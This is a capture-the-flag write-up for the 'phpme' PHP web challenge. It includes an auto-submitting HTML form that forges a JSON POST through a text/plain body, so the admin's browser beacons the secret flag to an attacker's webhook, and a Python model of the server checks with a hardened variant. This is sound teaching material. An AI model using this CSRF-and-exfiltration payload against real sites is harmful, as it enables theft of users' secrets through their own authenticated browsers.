Challenge description:
"This is what normal PHP CTF challenges look like, right?" - A web dev who barely knows PHP https://phpme.be.ax **https://adminbot.be.ax/phpme**
TL;DR
```html
<body onload="document.frm.submit()">
<form name="frm" enctype='text/plain' action="https://phpme.be.ax/" method="post">
<input name='{"yep": "yep yep yep", "url": "webhook", "trash": "' value='"}'>
<input type="submit" value="Submit">
</form>
</body>
```
When visiting https://phpme.be.ax, you'll be greeted with some PHP code:
```php
<?php
include "secret.php";
// https://stackoverflow.com/a/6041773
function isJSON($string) {
    json_decode($string);
    return json_last_error() === JSON_ERROR_NONE;
}
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if(isset($_COOKIE['secret']) && $_COOKIE['secret'] === $secret) {
        // https://stackoverflow.com/a/7084677
        $body = file_get_contents('php://input');
        if(isJSON($body) && is_object(json_decode($body))) {
            $json = json_decode($body, true);
            if(isset($json["yep"]) && $json["yep"] === "yep yep yep" && isset($json["url"])) {
                echo "<script>\n";
                echo "  let url = '" . htmlspecialchars($json["url"]) . "';\n";
                echo "  navigator.sendBeacon(url, '" . htmlspecialchars($flag) . "');\n";
                echo "</script>\n";
            }
            else {
                echo "nope :)";
            }
        }
        else {
            echo "not json bro";
        }
    }
    else {
        echo "ur not admin!!!";
    }
}
else {
    show_source(__FILE__);
}
?>
```
At https://adminbot.be.ax/phpme, you can submit a URL for the admin to visit.
Analyzing the PHP code
At the start of the page, we see that it includes a file called secret.php, which defines the two values hidden from us: $secret and $flag.
The interesting part is where those variables are used:
```php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if(isset($_COOKIE['secret']) && $_COOKIE['secret'] === $secret) {
        // https://stackoverflow.com/a/7084677
        $body = file_get_contents('php://input');
        if(isJSON($body) && is_object(json_decode($body))) {
            $json = json_decode($body, true);
            if(isset($json["yep"]) && $json["yep"] === "yep yep yep" && isset($json["url"])) {
                echo "<script>\n";
                echo "  let url = '" . htmlspecialchars($json["url"]) . "';\n";
                echo "  navigator.sendBeacon(url, '" . htmlspecialchars($flag) . "');\n";
                echo "</script>\n";
            }
            else {
                echo "nope :)";
            }
        }
        else {
            echo "not json bro";
        }
    }
    else {
        echo "ur not admin!!!";
    }
}
```
We first have two if-statements: the first checks that the request is a POST, the second that it carries a `secret` cookie whose value equals the server-side `$secret`.
Let's start with a simple POST request with curl.
```shell
curl -X POST https://phpme.be.ax/
```
We get back the message "ur not admin!!!", because we don't know the secret cookie value and so fail the cookie check.
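To see exactly what the server's chain of checks accepts, here is an added Python model of that PHP logic (this is not the challenge's code; the `SECRET`, the request dictionaries and the cookie value are constructed for the example). It encodes a form the way a browser does for `enctype='text/plain'` (one `name=value` line per field, CRLF-terminated, no escaping) and shows that the resulting body passes `isJSON`, `is_object` and the `yep`/`url` checks, because the PHP only inspects the body and never the `Content-Type`. A hardened variant that additionally requires `Content-Type: application/json` rejects the same body, since an HTML form can only send `application/x-www-form-urlencoded`, `multipart/form-data` or `text/plain`.

```python
import json

# Constructed for this example; the real $secret lives in secret.php.
SECRET = "example-secret-cookie-value"


def encode_text_plain_form(fields):
    """Encode form fields as a browser does for enctype='text/plain':
    'name=value' per field, each line terminated by CRLF, nothing escaped."""
    return "".join(f"{name}={value}\r\n" for name, value in fields)


def original_check(request):
    """Model of the page's PHP: method, cookie, then body-only JSON checks."""
    if request["method"] != "POST":
        return "show_source"
    if request["cookies"].get("secret") != SECRET:
        return "ur not admin!!!"
    try:
        parsed = json.loads(request["body"])      # isJSON(...)
    except ValueError:
        return "not json bro"
    if not isinstance(parsed, dict):               # is_object(json_decode(...))
        return "not json bro"
    if parsed.get("yep") == "yep yep yep" and "url" in parsed:
        return "beacon"   # the script sending $flag to $json["url"] would be emitted
    return "nope :)"


def hardened_check(request):
    """Same logic, gated on the request's media type. A cross-site HTML form
    cannot set application/json, so the text/plain form body is refused before
    the JSON checks run (a SameSite cookie attribute is a second, independent fix)."""
    media_type = request["headers"].get("Content-Type", "").split(";")[0].strip().lower()
    if media_type != "application/json":
        return "wrong content type"
    return original_check(request)


# Constructed request 1: what the admin's browser would send from the TL;DR form.
FORM_FIELDS = [('{"yep": "yep yep yep", "url": "webhook", "trash": "', '"}')]
FORM_REQUEST = {
    "method": "POST",
    "headers": {"Content-Type": "text/plain"},
    "cookies": {"secret": SECRET},
    "body": encode_text_plain_form(FORM_FIELDS),
}

# Constructed request 2: a legitimate JSON client with the cookie.
JSON_REQUEST = {
    "method": "POST",
    "headers": {"Content-Type": "application/json"},
    "cookies": {"secret": SECRET},
    "body": json.dumps({"yep": "yep yep yep", "url": "https://example.invalid/"}),
}

# Constructed request 3: our plain curl POST, no cookie at all.
CURL_REQUEST = {"method": "POST", "headers": {}, "cookies": {}, "body": ""}


if __name__ == "__main__":
    print("form body seen by server:", repr(FORM_REQUEST["body"]))
    for name, req in (("form", FORM_REQUEST), ("json", JSON_REQUEST), ("curl", CURL_REQUEST)):
        print(f"{name:5} original={original_check(req)!r:18} hardened={hardened_check(req)!r}")
```

The printed form body is `{"yep": "yep yep yep", "url": "webhook", "trash": "="}\r\n`: the `=` the browser inserts between name and value lands inside the throwaway `trash` string, and trailing CRLF is whitespace that both `json.loads` and PHP's `json_decode` ignore, which is why the body is valid JSON with exactly the keys the server wants.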